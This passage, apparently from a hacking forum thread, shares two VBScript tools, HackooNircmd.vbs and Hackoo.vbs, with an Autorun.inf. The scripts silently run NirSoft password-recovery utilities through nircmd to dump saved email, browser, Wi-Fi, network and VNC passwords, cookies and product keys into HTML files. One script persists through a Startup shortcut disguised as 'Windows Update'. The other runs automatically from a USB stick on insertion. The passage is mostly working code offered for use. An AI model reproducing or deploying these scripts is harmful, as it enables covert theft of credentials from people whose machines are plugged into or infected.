clipboard, or export them into text/html/csv/xml file. The code Source of "HackooNircmd.vbs" is : 'Main Program Copier Shortcut 'do CMD 'wscript.sleep 432000000 'Loop Function CMD() on error resume next Dim WshShell,Command,Command1,Command2,Command3,Command4,Command5,Command6,Command7, ​Command8,Command9,Command10,Command11,Command12,Command13 Dim Command14,Command15,Command16,Command17,dump Dim Result,Result1,Result2,Result3,Result4,Result5,Result6,Result7,Result8,Result9,R ​esult10,Result11,Result12,Result13,Result14,fso,nircmd,Windir Set fso = CreateObject("Scripting.FileSystemObject") Set windir = FSO.GetSpecialFolder(0) Set WshNetwork = CreateObject("WScript.Network") Set WshShell=WScript.CreateObject("WScript.Shell") NomMachine = WshNetwork.ComputerName tmp = WshShell.ExpandEnvironmentStrings("%temp%") f = tmp &amp; "\" &amp; NomMachine &amp; "_" &amp; Day(Now) &amp; "_" &amp; Month(Now) &amp; "_" &amp; Year(Now) If Not(fso.FolderExists(f)) Then fso.CreateFolder(f) end if dump = f &amp; "\dump" cible=windir &amp; "\" nircmd="nircmd.exe" if (not fso.fileexists(windir &amp; "\nircmd.exe")) then fso.copyfile nircmd , cible end if if (Not fso.Folderexists(cible &amp; "passrecovery")) then fso.CopyFolder "passrecovery", cible end if if (Not fso.Folderexists(dump)) then fso.CreateFolder dump end if 'Command = "%COMSPEC% /C nircmd.exe execmd mkdir dump\~$sys.computername$" 'Result = WshShell.Run(Command,0,True) Command1 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\mspass.exe /shtml"""" "&amp;dump&amp;"\IMClients.html" Command2 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\mailpv.exe /shtml"""" "&amp;dump&amp;"\mail.html" Command3 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\pspv.exe /shtml"""" "&amp;dump&amp;"\selected.html" Command4 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\iehv.exe /shtml"""" "&amp;dump&amp;"\history.html" Command5 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\ProduKey.exe /shtml"""" "&amp;dump&amp;"\ProductKey.html" Command6 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\iepv.exe /shtml"""" "&amp;dump&amp;"\IEPasswords.html" Command7 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\netpass.exe /shtml"""" "&amp;dump&amp;"\NetworkPasswords.html" Command8 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\pstpassword.exe /shtml"""" "&amp;dump&amp;"\PstPassword.html" Command9 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\cports.exe /shtml"""" "&amp;dump&amp;"\OpenPorts.html" Command10 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\awatch.exe /shtml"""" "&amp;dump&amp;"\NetworkAdapter.html" Command11 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\mzcv.exe /shtml"""" "&amp;dump&amp;"\MozillaCookies.html" Command12 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\wul.exe /shtml"""" "&amp;dump&amp;"\InstalledUpdates.html" Command13 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\strun.exe /shtml"""" "&amp;dump&amp;"\Startup.html" Command14 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\servimin.exe /shtml"""" "&amp;dump&amp;"\Services.html" Command15 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\WIFIKE.EXE /shtml"""" "&amp;dump&amp;"\WIFIKEY.html" Command16 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\ChromePass.exe /shtml"""" "&amp;dump&amp;"\ChromePass.html" Command17 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\SkypeLogView.exe /shtml"""" "&amp;dump&amp;"\SkypeLogView.html" Command18 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\PasswordFox.exe /shtml"""" "&amp;dump&amp;"\PasswordFox.html" Command19 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\VNCPassView.exe /shtml"""" "&amp;dump&amp;"\VNCPassView.html" Command20 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\dialupass.exe /shtml"""" "&amp;dump&amp;"\dialupass.html" Command21 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\MozillaHistoryView.exe /shtml"""" "&amp;dump&amp;"\MozillaHistoryView.html" Command22 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\MyLastSearch.exe /shtml"""" "&amp;dump&amp;"\MyLastSearch.html" Result1 = WshShell.Run(Command1,0,True) Result2 = WshShell.Run(Command2,0,True) Result3 = WshShell.Run(Command3,0,True) Result4 = WshShell.Run(Command4,0,True) Result5 = WshShell.Run(Command5,0,True) Result6 = WshShell.Run(Command6,0,True) Result7 = WshShell.Run(Command7,0,True) Result8 = WshShell.Run(Command8,0,True) Result9 = WshShell.Run(Command9,0,True) Result10 = WshShell.Run(Command10,0,True) Result11 = WshShell.Run(Command11,0,True) Result12 = WshShell.Run(Command12,0,True) Result13 = WshShell.Run(Command13,0,True) Result14 = WshShell.Run(Command14,0,True) Result15 = WshShell.Run(Command15,0,True) Result16 = WshShell.Run(Command16,0,True) Result17 = WshShell.Run(Command17,0,True) Result18 = WshShell.Run(Command18,0,True) Result19 = WshShell.Run(Command19,0,True) Result20 = WshShell.Run(Command20,0,True) Result21 = WshShell.Run(Command21,0,True) Result22 = WshShell.Run(Command22,0,True) End Function sub Shortcut dim shell,startupPath,link,temp,FSO,nom,WshNetwork Set Shell = CreateObject("WScript.Shell") startupPath = Shell.SpecialFolders("startup") Set FSO = WScript.CreateObject("Scripting.FileSystemObject") windir=FSO.GetSpecialFolder(0) Set link = Shell.CreateShortcut(startupPath &amp; "\Windows Update.lnk") link.Description = "Windows Update" link.IconLocation = "explorer.exe, 0" link.TargetPath = windir &amp; "\HackooNircmd.vbs" link.WorkingDirectory = windir link.Save end sub sub Copier Set fso = CreateObject("Scripting.FileSystemObject") Set windir = FSO.GetSpecialFolder(0) Cible=windir &amp; "\" if not (fso.fileexists(Cible &amp; wscript.scriptfullname)) then Set f1 = fso.GetFile(wscript.scriptfullname) fso.copyfile f1 ,Cible end if end sub Sub explorer() Dim objFSO, objFolder, objShell, f, strDirectory ,tmp Set objFSO = CreateObject("Scripting.FileSystemObject") Set WshNetwork = CreateObject("WScript.Network") Set WshShell=WScript.CreateObject("WScript.Shell") NomMachine = WshNetwork.ComputerName tmp = WshShell.ExpandEnvironmentStrings("%temp%") f = tmp &amp; "\" &amp; NomMachine &amp; "_" &amp; Day(Now) &amp; "_" &amp; Month(Now) &amp; "_" &amp; Year(Now) dump = f &amp; "\dump" strDirectory = dump 'If Err.Number = vbEmpty Then Set objShell = CreateObject("WScript.Shell") objShell.run ("Explorer" &amp; " " &amp; strDirectory &amp; "\") ' Else: WScript.echo "VBScript Error: " &amp; Err.Number 'End If End Sub Download Windows Password Recovery Tools + HackooNircmd.vbs
  16. Hi ! i have just downloaded USBSwitchblade_noU3. rar and i made a Script in VBscript to replace Batch files and to copy nircmd.exe in the windows Folder in the background not like batch file when is running you can see the black console i hope that resolve your problem man! The Srcipt Name is Hackoo.vbs you must put it in the root of your USB with nircmd.exe and edit and replace the Autorun.inf like this: ----------------------------Autorun-------------------------------------- [autorun] shellexecute = wscript Hackoo.vbs shell\open=Ouvrir shell\Open\Command= wscript Hackoo.vbs shell\open\Default=1 ------------------------------------------------------------------------------------------------------------------------------- '-----------------------------------------------Code Source of Hackoo.vbs------------------------------------------------ Function CMD() Dim WshShell,Command,Command1,Command2,Command3,Command4,Command5,Command6 Dim Command7,Command8,Command9,Command10,Command11,Command12,Command13,Command14 Dim Result,Result1,Result2,Result3,Result4,Result5,Result6,Result7 Dim Result8,Result9,Result10,Result11,Result12,Result13,Result14,fso,nircmd,Windir Set fso = CreateObject("Scripting.FileSystemObject") Set windir = FSO.GetSpecialFolder(0) cible=windir & "\" nircmd="nircmd.exe" if (not fso.fileexists(windir & "\nircmd.exe")) then fso.copyfile nircmd , cible end if Set WshShell=WScript.CreateObject("WScript.Shell") Command = "%COMSPEC% /C nircmd.exe execmd mkdir dump\~$sys.computername$" Command1 = "%COMSPEC% /C nircmd.exe execmd .\batexe\mspass.exe /shtml dump\~$sys.computername$\IMClients.html" Command2 = "%COMSPEC% /C nircmd.exe execmd .\batexe\mailpv.exe /shtml dump\~$sys.computername$\mail.html" Command3 = "%COMSPEC% /C nircmd.exe execmd .\batexe\pspv.exe /shtml dump\~$sys.computername$\selected.html" Command4 = "%COMSPEC% /C nircmd.exe execmd .\batexe\iehv.exe /shtml dump\~$sys.computername$\history.html" Command5 = "%COMSPEC% /C nircmd.exe execmd .\batexe\ProduKey.exe /shtml dump\~$sys.computername$\ProductKey.html" Command6 = "%COMSPEC% /C nircmd.exe execmd .\batexe\iepv.exe /shtml dump\~$sys.computername$\IEPasswords.html" Command7 = "%COMSPEC% /C nircmd.exe execmd .\batexe\netpass.exe /shtml dump\~$sys.computername$\NetworkPasswords.html" Command8 = "%COMSPEC% /C nircmd.exe execmd .\batexe\pstpassword.exe /shtml dump\~$sys.computername$\PstPassword.html" Command9 = "%COMSPEC% /C nircmd.exe execmd .\batexe\cports.exe /shtml dump\~$sys.computername$\OpenPorts.html" Command10 = "%COMSPEC% /C nircmd.exe execmd .\batexe\awatch.exe /shtml dump\~$sys.computername$\NetworkAdapter.html" Command11 = "%COMSPEC% /C nircmd.exe execmd .\batexe\mzcv.exe /shtml dump\~$sys.computername$\MozillaCookies.html" Command12 = "%COMSPEC% /C nircmd.exe execmd .\batexe\wul.exe /shtml dump\~$sys.computername$\InstalledUpdates.html" Command13 = "%COMSPEC% /C nircmd.exe execmd .\batexe\strun.exe /shtml dump\~$sys.computername$\Startup.html" Command14 = "%COMSPEC% /C nircmd.exe execmd .\batexe\servimin.exe /shtml dump\~$sys.computername$\Services.html" Result = WshShell.Run(Command,0,True) Result1 = WshShell.Run(Command1,0,True) Result2 = WshShell.Run(Command2,0,True) Result3 = WshShell.Run(Command3,0,True) Result4 = WshShell.Run(Command4,0,True) Result5 = WshShell.Run(Command5,0,True) Result6 = WshShell.Run(Command6,0,True) Result7 = WshShell.Run(Command7,0,True) Result8 = WshShell.Run(Command8,0,True) Result9 = WshShell.Run(Command9,0,True) Result10 = WshShell.Run(Command10,0,True) Result11 = WshShell.Run(Command11,0,True) Result12 = WshShell.Run(Command12,0,True) Result13 = WshShell.Run(Command13,0,True) Result14 = WshShell.Run(Command14,0,True) End Function Function explorer Set shl=CreateObject("Shell.Application") Set fso = CreateObject("Scripting.FileSystemObject") shl.Explore fso.GetParentFolderName(location) end Function CMD explorer '------------------------------------------------------------------------------------------------------------------------------- Hackoo.rar
×
×
  • Create New...